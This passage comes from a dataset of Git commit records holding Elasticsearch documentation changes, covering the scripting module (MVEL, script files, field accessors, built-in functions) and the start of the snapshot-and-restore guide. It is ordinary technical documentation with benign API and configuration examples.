gramma\n","repos":"aparo\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,fubuki\/elasticsearch,vorce\/es-metrics,aparo\/elasticsearch,aparo\/elasticsearch,aparo\/elasticsearch,vorce\/es-metrics,aparo\/elasticsearch,vorce\/es-metrics,fubuki\/elasticsearch,vorce\/es-metrics,fubuki\/elasticsearch,vorce\/es-metrics,aparo\/elasticsearch","old_file":"docs\/reference\/modules\/scripting.asciidoc","new_file":"docs\/reference\/modules\/scripting.asciidoc","new_contents":"[[modules-scripting]]\n== Scripting\n\nThe scripting module allows to use scripts in order to evaluate custom\nexpressions. For example, scripts can be used to return \"script fields\"\nas part of a search request, or can be used to evaluate a custom score\nfor a query and so on.\n\nThe scripting module uses by default http:\/\/mvel.codehaus.org\/[mvel] as\nthe scripting language with some extensions. mvel is used since it is\nextremely fast and very simple to use, and in most cases, simple\nexpressions are needed (for example, mathematical equations).\n\nAdditional `lang` plugins are provided to allow to execute scripts in\ndifferent languages. Currently supported plugins are `lang-javascript`\nfor JavaScript, `lang-groovy` for Groovy, and `lang-python` for Python.\nAll places where a `script` parameter can be used, a `lang` parameter\n(on the same level) can be provided to define the language of the\nscript. 
The `lang` options are `mvel`, `js`, `groovy`, `python`, and\n`native`.\n\nadded[1.2.0, Dynamic scripting is disabled by default since version 1.2.0]\n\nTo increase security, Elasticsearch does not allow you to specify scripts with a\nrequest. Instead, scripts must be placed in the `scripts` directory inside the\nconfiguration directory (the directory where elasticsearch.yml is). Scripts\nplaced into this directory will automatically be picked up and made available for\nuse. Once a script has been placed in this directory, it can be referenced\nby name. For example, a script called `calculate-score.mvel` can be referenced\nin a request like this:\n\n[source,sh]\n--------------------------------------------------\n$ tree config\nconfig\n\u251c\u2500\u2500 elasticsearch.yml\n\u251c\u2500\u2500 logging.yml\n\u2514\u2500\u2500 scripts\n \u2514\u2500\u2500 calculate-score.mvel\n--------------------------------------------------\n\n[source,sh]\n--------------------------------------------------\n$ cat config\/scripts\/calculate-score.mvel\nMath.log(_score * 2) + my_modifier\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\ncurl -XPOST localhost:9200\/_search -d '{\n \"query\": {\n \"function_score\": {\n \"query\": {\n \"match\": {\n \"body\": \"foo\"\n }\n },\n \"functions\": [\n {\n \"script_score\": {\n \"script\": \"calculate-score\",\n \"params\": {\n \"my_modifier\": 8\n }\n }\n }\n ]\n }\n }\n}'\n--------------------------------------------------\n\nThe name of the script is derived from the hierarchy of directories it\nexists under, and the file name without the lang extension. For example,\na script placed under `config\/scripts\/group1\/group2\/test.py` will be\nnamed `group1_group2_test`.\n\n
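Such a script can then be referenced by that derived name together with the matching `lang` - a sketch following the `calculate-score` example above (the surrounding query is illustrative):\n\n[source,js]\n--------------------------------------------------\ncurl -XPOST localhost:9200\/_search -d '{\n \"query\": {\n \"function_score\": {\n \"functions\": [\n {\n \"script_score\": {\n \"script\": \"group1_group2_test\",\n \"lang\": \"python\"\n }\n }\n ]\n }\n }\n}'\n--------------------------------------------------\n\n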
Instead of sending the name of the file as the\nscript, the body of the script can be sent instead.\n\n[float]\n=== Automatic Script Reloading\n\nThe `config\/scripts` directory is scanned periodically for changes.\nNew and changed scripts are reloaded and deleted script are removed\nfrom preloaded scripts cache. The reload frequency can be specified\nusing `watcher.interval` setting, which defaults to `60s`.\nTo disable script reloading completely set `script.auto_reload_enabled`\nto `false`.\n\n[float]\n=== Native (Java) Scripts\n\nEven though `mvel` is pretty fast, this allows to register native Java based\nscripts for faster execution.\n\nIn order to allow for scripts, the `NativeScriptFactory` needs to be\nimplemented that constructs the script that will be executed. There are\ntwo main types, one that extends `AbstractExecutableScript` and one that\nextends `AbstractSearchScript` (probably the one most users will extend,\nwith additional helper classes in `AbstractLongSearchScript`,\n`AbstractDoubleSearchScript`, and `AbstractFloatSearchScript`).\n\nRegistering them can either be done by settings, for example:\n`script.native.my.type` set to `sample.MyNativeScriptFactory` will\nregister a script named `my`. Another option is in a plugin, access\n`ScriptModule` and call `registerScript` on it.\n\nExecuting the script is done by specifying the `lang` as `native`, and\nthe name of the script as the `script`.\n\nNote, the scripts need to be in the classpath of elasticsearch. One\nsimple way to do it is to create a directory under plugins (choose a\ndescriptive name), and place the jar \/ classes files there, they will be\nautomatically loaded.\n\n[float]\n=== Score\n\nIn all scripts that can be used in facets, allow to access the current\ndoc score using `doc.score`.\n\n[float]\n=== Computing scores based on terms in scripts\n\nsee <<modules-advanced-scripting, advanced scripting documentation>>\n\n[float]\n=== Document Fields\n\nMost scripting revolve around the use of specific document fields data.\nThe `doc['field_name']` can be used to access specific field data within\na document (the document in question is usually derived by the context\nthe script is used). Document fields are very fast to access since they\nend up being loaded into memory (all the relevant field values\/tokens\nare loaded to memory).\n\nThe following data can be extracted from a field:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Expression |Description\n|`doc['field_name'].value` |The native value of the field. For example,\nif its a short type, it will be short.\n\n|`doc['field_name'].values` |The native array values of the field. For\nexample, if its a short type, it will be short[]. Remember, a field can\nhave several values within a single doc. 
Returns an empty array if the\nfield has no values.\n\n|`doc['field_name'].empty` |A boolean indicating if the field has no\nvalues within the doc.\n\n|`doc['field_name'].multiValued` |A boolean indicating that the field\nhas several values within the corpus.\n\n|`doc['field_name'].lat` |The latitude of a geo point type.\n\n|`doc['field_name'].lon` |The longitude of a geo point type.\n\n|`doc['field_name'].lats` |The latitudes of a geo point type.\n\n|`doc['field_name'].lons` |The longitudes of a geo point type.\n\n|`doc['field_name'].distance(lat, lon)` |The `plane` distance (in meters)\nof this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceWithDefault(lat, lon, default)` |The `plane` distance (in meters)\nof this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].distanceInMiles(lat, lon)` |The `plane` distance (in\nmiles) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceInMilesWithDefault(lat, lon, default)` |The `plane` distance (in\nmiles) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].distanceInKm(lat, lon)` |The `plane` distance (in\nkm) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceInKmWithDefault(lat, lon, default)` |The `plane` distance (in\nkm) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistance(lat, lon)` |The `arc` distance (in\nmeters) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceWithDefault(lat, lon, default)` |The `arc` distance (in\nmeters) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistanceInMiles(lat, lon)` |The `arc` distance (in\nmiles) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceInMilesWithDefault(lat, lon, default)` |The `arc` distance (in\nmiles) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistanceInKm(lat, lon)` |The `arc` distance (in\nkm) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceInKmWithDefault(lat, lon, default)` |The `arc` distance (in\nkm) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].factorDistance(lat, lon)` |The distance factor of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].factorDistance(lat, lon, default)` |The distance factor of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].geohashDistance(geohash)` |The `arc` distance (in meters)\nof this geo point field from the provided geohash.\n\n|`doc['field_name'].geohashDistanceInKm(geohash)` |The `arc` distance (in km)\nof this geo point field from the provided geohash.\n\n|`doc['field_name'].geohashDistanceInMiles(geohash)` |The `arc` distance (in\nmiles) of this geo point field from the provided geohash.\n|=======================================================================\n\n[float]\n=== Stored Fields\n\nStored fields can also be accessed when executing a script. Note, they\nare much slower to access compared with document fields, as they are not\nloaded into memory. They can be simply accessed using\n`_fields['my_field_name'].value` or `_fields['my_field_name'].values`.\n\n[float]\n=== Source Field\n\nThe source field can also be accessed when executing a script. 
[float]\n=== Stored Fields\n\nStored fields can also be accessed when executing a script. Note, they\nare much slower to access compared with document fields, as they are not\nloaded into memory. They can be simply accessed using\n`_fields['my_field_name'].value` or `_fields['my_field_name'].values`.\n\n[float]\n=== Source Field\n\nThe source field can also be accessed when executing a script. The\nsource field is loaded per doc, parsed, and then provided to the script\nfor evaluation. The `_source` forms the context under which the source\nfield can be accessed, for example `_source.obj2.obj1.field3`.\n\nAccessing `_source` is much slower compared to using `_doc`\nbut the data is not loaded into memory. For a single field access, `_fields` may be\nfaster than using `_source` due to the extra overhead of potentially parsing large documents.\nHowever, `_source` may be faster if you access multiple fields or if the source has already been\nloaded for other purposes.\n\n\n[float]\n=== mvel Built In Functions\n\nThere are several built in functions that can be used within scripts.\nThey include:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Function |Description\n|`time()` |The current time in milliseconds.\n\n|`sin(a)` |Returns the trigonometric sine of an angle.\n\n|`cos(a)` |Returns the trigonometric cosine of an angle.\n\n|`tan(a)` |Returns the trigonometric tangent of an angle.\n\n|`asin(a)` |Returns the arc sine of a value.\n\n|`acos(a)` |Returns the arc cosine of a value.\n\n|`atan(a)` |Returns the arc tangent of a value.\n\n|`toRadians(angdeg)` |Converts an angle measured in degrees to an\napproximately equivalent angle measured in radians\n\n|`toDegrees(angrad)` |Converts an angle measured in radians to an\napproximately equivalent angle measured in degrees.\n\n|`exp(a)` |Returns Euler's number _e_ raised to the power of value.\n\n|`log(a)` |Returns the natural logarithm (base _e_) of a value.\n\n|`log10(a)` |Returns the base 10 logarithm of a value.\n\n|`sqrt(a)` |Returns the correctly rounded positive square root of a\nvalue.\n\n|`cbrt(a)` |Returns the cube root of a double value.\n\n|`IEEEremainder(f1, f2)` |Computes the remainder operation on two\narguments as prescribed by the IEEE 754 standard.\n\n|`ceil(a)` |Returns the smallest (closest to negative infinity) value\nthat is greater than or equal to the argument and is equal to a\nmathematical integer.\n\n|`floor(a)` |Returns the largest (closest to positive infinity) value\nthat is less than or equal to the argument and is equal to a\nmathematical integer.\n\n|`rint(a)` |Returns the value that is closest in value to the argument\nand is equal to a mathematical integer.\n\n|`atan2(y, x)` |Returns the angle _theta_ from the conversion of\nrectangular coordinates (_x_, _y_) to polar coordinates (r,_theta_).\n\n|`pow(a, b)` |Returns the value of the first argument raised to the\npower of the second argument.\n\n|`round(a)` |Returns the closest _int_ to the argument.\n\n|`random()` |Returns a random _double_ value.\n\n|`abs(a)` |Returns the absolute value of a value.\n\n|`max(a, b)` |Returns the greater of two values.\n\n|`min(a, b)` |Returns the smaller of two values.\n\n|`ulp(d)` |Returns the size of an ulp of the argument.\n\n|`signum(d)` |Returns the signum function of the argument.\n\n|`sinh(x)` |Returns the hyperbolic sine of a value.\n\n|`cosh(x)` |Returns the hyperbolic cosine of a value.\n\n|`tanh(x)` |Returns the hyperbolic tangent of a value.\n\n|`hypot(x, y)` |Returns sqrt(_x2_ + _y2_) without intermediate overflow\nor underflow.\n|=======================================================================\n\n[float]\n=== Arithmetic precision in MVEL\n\nWhen dividing two numbers using MVEL-based scripts, the engine tries to\nbe smart and adheres to the default behaviour of Java. This means that if you\ndivide two integers (you might have configured the fields as integer in\nthe mapping), the result will also be an integer. So if a\ncalculation like `1\/num` appears in your scripts and `num` is an\ninteger with the value of `8`, the result is `0` even though you were\nexpecting it to be `0.125`. You may need to enforce precision by\nexplicitly using a double like `1.0\/num` in order to get the expected\nresult.\n
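\nA quick illustration of the difference (an mvel sketch; variable names and values are illustrative):\n\n[source,js]\n--------------------------------------------------\nnum = 8;\nintResult = 1 \/ num;      \/\/ 0 - integer division\ndoubleResult = 1.0 \/ num; \/\/ 0.125 - floating point division\n--------------------------------------------------\n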
","old_contents":"[[modules-scripting]]\n== Scripting\n\nThe scripting module allows to use scripts in order to evaluate custom\nexpressions. For example, scripts can be used to return \"script fields\"\nas part of a search request, or can be used to evaluate a custom score\nfor a query and so on.\n\nThe scripting module uses by default http:\/\/mvel.codehaus.org\/[mvel] as\nthe scripting language with some extensions. mvel is used since it is\nextremely fast and very simple to use, and in most cases, simple\nexpressions are needed (for example, mathematical equations).\n\nAdditional `lang` plugins are provided to allow to execute scripts in\ndifferent languages. Currently supported plugins are `lang-javascript`\nfor JavaScript, `lang-groovy` for Groovy, and `lang-python` for Python.\nAll places where a `script` parameter can be used, a `lang` parameter\n(on the same level) can be provided to define the language of the\nscript. The `lang` options are `mvel`, `js`, `groovy`, `python`, and\n`native`.\n\nadded[1.2.0, Dynamic scripting is disabled by default since version 1.2.0]\n\nTo increase security, Elasticsearch does not allow you to specify scripts with a\nrequest. Instead, scripts must be placed in the `scripts` directory inside the\nconfiguration directory (the directory where elasticsearch.yml is). Scripts\nplaced into this directory will automatically be picked up and be available to\nbe used. Once a script has been placed in this directory, it can be referenced\nby name. For example, a script called `calculate-score.mvel` can be referenced\nin a request like this:\n\n[source,sh]\n--------------------------------------------------\n$ tree config\nconfig\n\u251c\u2500\u2500 elasticsearch.yml\n\u251c\u2500\u2500 logging.yml\n\u2514\u2500\u2500 scripts\n \u2514\u2500\u2500 calculate-score.mvel\n--------------------------------------------------\n\n[source,sh]\n--------------------------------------------------\n$ cat config\/scripts\/calculate-score.mvel\nMath.log(_score * 2) + my_modifier\n--------------------------------------------------\n\n[source,js]\n--------------------------------------------------\ncurl -XPOST localhost:9200\/_search -d '{\n \"query\": {\n \"function_score\": {\n \"query\": {\n \"match\": {\n \"body\": \"foo\"\n }\n },\n \"functions\": [\n {\n \"script_score\": {\n \"script\": \"calculate-score\",\n \"params\": {\n \"my_modifier\": 8\n }\n }\n }\n ]\n }\n }\n}'\n--------------------------------------------------\n\nThe name of the script is derived from the hierarchy of directories it\nexists under, and the file name without the lang extension. For example,\na script placed under `config\/scripts\/group1\/group2\/test.py` will be\nnamed `group1_group2_test`.\n\n[float]\n=== Default Scripting Language\n\nThe default scripting language (assuming no `lang` parameter is\nprovided) is `mvel`. 
In order to change it set the `script.default_lang`\nto the appropriate language.\n\n[float]\n=== Enabling dynamic scripting\n\nWe recommend running Elasticsearch behind an application or proxy,\nwhich protects Elasticsearch from the outside world. If users are\nallowed to run dynamic scripts (even in a search request), then they\nhave the same access to your box as the user that Elasticsearch is\nrunning as. For this reason dynamic scripting is disabled by default.\n\nFirst, you should not run Elasticsearch as the `root` user, as this would allow\na script to access or do *anything* on your server, without limitations. Second,\nyou should not expose Elasticsearch directly to users, but instead have a proxy\napplication inbetween. If you *do* intend to expose Elasticsearch directly to\nyour users, then you have to decide whether you trust them enough to run scripts\non your box or not. If you do, you can enable dynamic scripting by adding the\nfollowing setting to the `config\/elasticsearch.yml` file on every node:\n\n[source,yaml]\n-----------------------------------\nscript.disable_dynamic: false\n-----------------------------------\n\nWhile this still allows execution of named scripts provided in the config, or\n_native_ Java scripts registered through plugins, it also allows users to run\narbitrary scripts via the API. Instead of sending the name of the file as the\nscript, the body of the script can be sent instead.\n\n[float]\n=== Automatic Script Reloading\n\nThe `config\/scripts` directory is scanned periodically for changes.\nNew and changed scripts are reloaded and deleted script are removed\nfrom preloaded scripts cache. The reload frequency can be specified\nusing `watcher.interval` setting, which defaults to `60s`.\nTo disable script reloading completely set `script.auto_reload_enabled`\nto `false`.\n\n[float]\n=== Native (Java) Scripts\n\nEven though `mvel` is pretty fast, this allows to register native Java based\nscripts for faster execution.\n\nIn order to allow for scripts, the `NativeScriptFactory` needs to be\nimplemented that constructs the script that will be executed. There are\ntwo main types, one that extends `AbstractExecutableScript` and one that\nextends `AbstractSearchScript` (probably the one most users will extend,\nwith additional helper classes in `AbstractLongSearchScript`,\n`AbstractDoubleSearchScript`, and `AbstractFloatSearchScript`).\n\nRegistering them can either be done by settings, for example:\n`script.native.my.type` set to `sample.MyNativeScriptFactory` will\nregister a script named `my`. Another option is in a plugin, access\n`ScriptModule` and call `registerScript` on it.\n\nExecuting the script is done by specifying the `lang` as `native`, and\nthe name of the script as the `script`.\n\nNote, the scripts need to be in the classpath of elasticsearch. One\nsimple way to do it is to create a directory under plugins (choose a\ndescriptive name), and place the jar \/ classes files there, they will be\nautomatically loaded.\n\n[float]\n=== Score\n\nIn all scripts that can be used in facets, allow to access the current\ndoc score using `doc.score`.\n\n[float]\n=== Computing scores based on terms in scripts\n\nsee <<modules-advanced-scripting, advanced scripting documentation>>\n\n[float]\n=== Document Fields\n\nMost scripting revolve around the use of specific document fields data.\nThe `doc['field_name']` can be used to access specific field data within\na document (the document in question is usually derived by the context\nthe script is used). 
Document fields are very fast to access since they\nend up being loaded into memory (all the relevant field values\/tokens\nare loaded to memory).\n\nThe following data can be extracted from a field:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Expression |Description\n|`doc['field_name'].value` |The native value of the field. For example,\nif its a short type, it will be short.\n\n|`doc['field_name'].values` |The native array values of the field. For\nexample, if its a short type, it will be short[]. Remember, a field can\nhave several values within a single doc. Returns an empty array if the\nfield has no values.\n\n|`doc['field_name'].empty` |A boolean indicating if the field has no\nvalues within the doc.\n\n|`doc['field_name'].multiValued` |A boolean indicating that the field\nhas several values within the corpus.\n\n|`doc['field_name'].lat` |The latitude of a geo point type.\n\n|`doc['field_name'].lon` |The longitude of a geo point type.\n\n|`doc['field_name'].lats` |The latitudes of a geo point type.\n\n|`doc['field_name'].lons` |The longitudes of a geo point type.\n\n|`doc['field_name'].distance(lat, lon)` |The `plane` distance (in meters)\nof this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceWithDefault(lat, lon, default)` |The `plane` distance (in meters)\nof this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].distanceInMiles(lat, lon)` |The `plane` distance (in\nmiles) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceInMilesWithDefault(lat, lon, default)` |The `plane` distance (in\nmiles) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].distanceInKm(lat, lon)` |The `plane` distance (in\nkm) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].distanceInKmWithDefault(lat, lon, default)` |The `plane` distance (in\nkm) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistance(lat, lon)` |The `arc` distance (in\nmeters) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceWithDefault(lat, lon, default)` |The `arc` distance (in\nmeters) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistanceInMiles(lat, lon)` |The `arc` distance (in\nmiles) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceInMilesWithDefault(lat, lon, default)` |The `arc` distance (in\nmiles) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].arcDistanceInKm(lat, lon)` |The `arc` distance (in\nkm) of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].arcDistanceInKmWithDefault(lat, lon, default)` |The `arc` distance (in\nkm) of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].factorDistance(lat, lon)` |The distance factor of this geo point field from the provided lat\/lon.\n\n|`doc['field_name'].factorDistance(lat, lon, default)` |The distance factor of this geo point field from the provided lat\/lon with a default value.\n\n|`doc['field_name'].geohashDistance(geohash)` |The `arc` distance (in meters)\nof this geo point field from the provided geohash.\n\n|`doc['field_name'].geohashDistanceInKm(geohash)` |The `arc` distance (in km)\nof this geo point field from the provided 
geohash.\n\n|`doc['field_name'].geohashDistanceInMiles(geohash)` |The `arc` distance (in\nmiles) of this geo point field from the provided geohash.\n|=======================================================================\n\n[float]\n=== Stored Fields\n\nStored fields can also be accessed when executing a script. Note, they\nare much slower to access compared with document fields, but are not\nloaded into memory. They can be simply accessed using\n`_fields['my_field_name'].value` or `_fields['my_field_name'].values`.\n\n[float]\n=== Source Field\n\nThe source field can also be accessed when executing a script. The\nsource field is loaded per doc, parsed, and then provided to the script\nfor evaluation. The `_source` forms the context under which the source\nfield can be accessed, for example `_source.obj2.obj1.field3`.\n\nAccessing `_source` is much slower compared to using `_doc`\nbut the data is not loaded into memory. For a single field access `_fields` may be\nfaster than using `_source` due to the extra overhead of potentially parsing large documents.\nHowever, `_source` may be faster if you access multiple fields or if the source has already been\nloaded for other purposes.\n\n\n[float]\n=== mvel Built In Functions\n\nThere are several built in functions that can be used within scripts.\nThey include:\n\n[cols=\"<,<\",options=\"header\",]\n|=======================================================================\n|Function |Description\n|`time()` |The current time in milliseconds.\n\n|`sin(a)` |Returns the trigonometric sine of an angle.\n\n|`cos(a)` |Returns the trigonometric cosine of an angle.\n\n|`tan(a)` |Returns the trigonometric tangent of an angle.\n\n|`asin(a)` |Returns the arc sine of a value.\n\n|`acos(a)` |Returns the arc cosine of a value.\n\n|`atan(a)` |Returns the arc tangent of a value.\n\n|`toRadians(angdeg)` |Converts an angle measured in degrees to an\napproximately equivalent angle measured in radians\n\n|`toDegrees(angrad)` |Converts an angle measured in radians to an\napproximately equivalent angle measured in degrees.\n\n|`exp(a)` |Returns Euler's number _e_ raised to the power of value.\n\n|`log(a)` |Returns the natural logarithm (base _e_) of a value.\n\n|`log10(a)` |Returns the base 10 logarithm of a value.\n\n|`sqrt(a)` |Returns the correctly rounded positive square root of a\nvalue.\n\n|`cbrt(a)` |Returns the cube root of a double value.\n\n|`IEEEremainder(f1, f2)` |Computes the remainder operation on two\narguments as prescribed by the IEEE 754 standard.\n\n|`ceil(a)` |Returns the smallest (closest to negative infinity) value\nthat is greater than or equal to the argument and is equal to a\nmathematical integer.\n\n|`floor(a)` |Returns the largest (closest to positive infinity) value\nthat is less than or equal to the argument and is equal to a\nmathematical integer.\n\n|`rint(a)` |Returns the value that is closest in value to the argument\nand is equal to a mathematical integer.\n\n|`atan2(y, x)` |Returns the angle _theta_ from the conversion of\nrectangular coordinates (_x_, _y_) to polar coordinates (r,_theta_).\n\n|`pow(a, b)` |Returns the value of the first argument raised to the\npower of the second argument.\n\n|`round(a)` |Returns the closest _int_ to the argument.\n\n|`random()` |Returns a random _double_ value.\n\n|`abs(a)` |Returns the absolute value of a value.\n\n|`max(a, b)` |Returns the greater of two values.\n\n|`min(a, b)` |Returns the smaller of two values.\n\n|`ulp(d)` |Returns the size of an ulp of the argument.\n\n|`signum(d)` |Returns 
the signum function of the argument.\n\n|`sinh(x)` |Returns the hyperbolic sine of a value.\n\n|`cosh(x)` |Returns the hyperbolic cosine of a value.\n\n|`tanh(x)` |Returns the hyperbolic tangent of a value.\n\n|`hypot(x, y)` |Returns sqrt(_x2_ + _y2_) without intermediate overflow\nor underflow.\n|=======================================================================\n\n[float]\n=== Arithmetic precision in MVEL\n\nWhen dividing two numbers using MVEL based scripts, the engine tries to\nbe smart and adheres to the default behaviour of java. This means if you\ndivide two integers (you might have configured the fields as integer in\nthe mapping), the result will also be an integer. This means, if a\ncalculation like `1\/num` is happening in your scripts and `num` is an\ninteger with the value of `8`, the result is `0` even though you were\nexpecting it to be `0.125`. You may need to enforce precision by\nexplicitly using a double like `1.0\/num` in order to get the expected\nresult.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"450b0233827f3423648b35e295102cce9b1bc5f1","subject":"Fixed references to Multi Index Syntax (#27283)","message":"Fixed references to Multi Index Syntax (#27283)\n\n","repos":"vroyer\/elassandra,vroyer\/elassandra,strapdata\/elassandra,vroyer\/elasticassandra,strapdata\/elassandra,vroyer\/elasticassandra,vroyer\/elassandra,vroyer\/elasticassandra,strapdata\/elassandra,strapdata\/elassandra,strapdata\/elassandra","old_file":"docs\/reference\/modules\/snapshots.asciidoc","new_file":"docs\/reference\/modules\/snapshots.asciidoc","new_contents":"[[modules-snapshots]]\n== Snapshot And Restore\n\nYou can store snapshots of individual indices or an entire cluster in\na remote repository like a shared file system, S3, or HDFS. These snapshots\nare great for backups because they can be restored relatively quickly. However,\nsnapshots can only be restored to versions of Elasticsearch that can read the\nindices:\n\n* A snapshot of an index created in 5.x can be restored to 6.x.\n* A snapshot of an index created in 2.x can be restored to 5.x.\n* A snapshot of an index created in 1.x can be restored to 2.x.\n\nConversely, snapshots of indices created in 1.x **cannot** be restored to\n5.x or 6.x, and snapshots of indices created in 2.x **cannot** be restored\nto 6.x.\n\nSnapshots are incremental and can contain indices created in various\nversions of Elasticsearch. If any indices in a snapshot were created in an\nincompatible version, you will not be able to restore the snapshot.\n\nIMPORTANT: When backing up your data prior to an upgrade, keep in mind that you\nwon't be able to restore snapshots after you upgrade if they contain indices\ncreated in a version that's incompatible with the upgrade version.\n\nIf you end up in a situation where you need to restore a snapshot of an index\nthat is incompatible with the version of the cluster you are currently running,\nyou can restore it on the latest compatible version and use\n<<reindex-from-remote,reindex-from-remote>> to rebuild the index on the current\nversion. Reindexing from remote is only possible if the original index has\nsource enabled. Retrieving and reindexing the data can take significantly longer\nthan simply restoring a snapshot.
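\n\nAs an illustration, a reindex-from-remote request has this shape (the host\nand index names here are hypothetical, and the remote host must also be\nwhitelisted via the `reindex.remote.whitelist` setting):\n\n[source,js]\n-----------------------------------\nPOST _reindex\n{\n \"source\": {\n \"remote\": {\n \"host\": \"http:\/\/oldcluster.example.com:9200\"\n },\n \"index\": \"index_restored_on_old_version\"\n },\n \"dest\": {\n \"index\": \"index_rebuilt_on_current_version\"\n }\n}\n-----------------------------------\n\n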
If you have a large amount of data, we\nrecommend testing the reindex from remote process with a subset of your data to\nunderstand the time requirements before proceeding.\n\n[float]\n=== Repositories\n\nYou must register a snapshot repository before you can perform snapshot and\nrestore operations. We recommend creating a new snapshot repository for each\nmajor version. The valid repository settings depend on the repository type.\n\nIf you register the same snapshot repository with multiple clusters, only\none cluster should have write access to the repository. All other clusters\nconnected to that repository should set the repository to `readonly` mode.\n\nNOTE: The snapshot format can change across major versions, so if you have\nclusters on different major versions trying to write the same repository,\nnew snapshots written by one version will not be visible to the other. While\nsetting the repository to `readonly` on all but one of the clusters should work\nwith multiple clusters differing by one major version, it is not a supported\nconfiguration.\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup_location\"\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TESTSETUP\n\nTo retrieve information about a registered repository, use a GET request:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/my_backup\n-----------------------------------\n\/\/ CONSOLE\n\nwhich returns:\n\n[source,js]\n-----------------------------------\n{\n \"my_backup\": {\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_backup_location\"\n }\n }\n}\n-----------------------------------\n\/\/ TESTRESPONSE\n\nTo retrieve information about multiple repositories, specify a\ncomma-delimited list of repositories. You can also use the * wildcard when\nspecifying repository names. For example, the following request retrieves\ninformation about all of the snapshot repositories that start with `repo` or\ncontain `backup`:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/repo*,*backup*\n-----------------------------------\n\/\/ CONSOLE\n\nTo retrieve information about all registered snapshot repositories, omit the\nrepository name or specify `_all`:\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\n-----------------------------------\n\/\/ CONSOLE\n\nor\n\n[source,js]\n-----------------------------------\nGET \/_snapshot\/_all\n-----------------------------------\n\/\/ CONSOLE\n\n[float]\n===== Shared File System Repository\n\nThe shared file system repository (`\"type\": \"fs\"`) uses the shared file system to store snapshots. In order to register\nthe shared file system repository it is necessary to mount the same shared filesystem to the same location on all\nmaster and data nodes.
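\n\nFor example, on Linux nodes an NFS export might be mounted like this on every\nmaster and data node (the server name and paths are hypothetical; any shared\nfilesystem supported by your platform works the same way):\n\n[source,sh]\n-----------------------------------\nmount -t nfs backups.example.com:\/exports\/backups \/mount\/backups\n-----------------------------------\n\n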
This location (or one of its parent directories) must be registered in the `path.repo`\nsetting on all master and data nodes.\n\nAssuming that the shared filesystem is mounted to `\/mount\/backups\/my_backup`, the following setting should be added to\nthe `elasticsearch.yml` file:\n\n[source,yaml]\n--------------\npath.repo: [\"\/mount\/backups\", \"\/mount\/longterm_backups\"]\n--------------\n\nThe `path.repo` setting supports Microsoft Windows UNC paths as long as at least the server name and share are specified as\na prefix and backslashes are properly escaped:\n\n[source,yaml]\n--------------\npath.repo: [\"\\\\\\\\MY_SERVER\\\\Snapshots\"]\n--------------\n\nAfter all nodes are restarted, the following command can be used to register the shared file system repository with\nthe name `my_backup`:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_fs_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"\/mount\/backups\/my_fs_backup_location\",\n \"compress\": true\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[skip:no access to absolute path]\n\nIf the repository location is specified as a relative path, this path will be resolved against the first path specified\nin `path.repo`:\n\n[source,js]\n-----------------------------------\nPUT \/_snapshot\/my_fs_backup\n{\n \"type\": \"fs\",\n \"settings\": {\n \"location\": \"my_fs_backup_location\",\n \"compress\": true\n }\n}\n-----------------------------------\n\/\/ CONSOLE\n\/\/ TEST[continued]\n\nThe following settings are supported:\n\n[horizontal]\n`location`:: Location of the snapshots. Mandatory.\n`compress`:: Turns on compression of the snapshot files. Compression is applied only to metadata files (index mapping and settings). Data files are not compressed. Defaults to `true`.\n`chunk_size`:: Big files can be broken down into chunks during snapshotting if needed. The chunk size can be specified in bytes or by\n using size value notation, i.e. 1g, 10m, 5k. Defaults to `null` (unlimited chunk size).\n`max_restore_bytes_per_sec`:: Throttles per node restore rate. Defaults to `40mb` per second.\n`max_snapshot_bytes_per_sec`:: Throttles per node snapshot rate. Defaults to `40mb` per second.\n`readonly`:: Makes repository read-only. Defaults to `false`.\n\n[float]\n===== Read-only URL Repository\n\nThe URL repository (`\"type\": \"url\"`) can be used as an alternative read-only way to access data created by the shared file\nsystem repository. The URL specified in the `url` parameter should point to the root of the shared filesystem repository.\nThe following settings 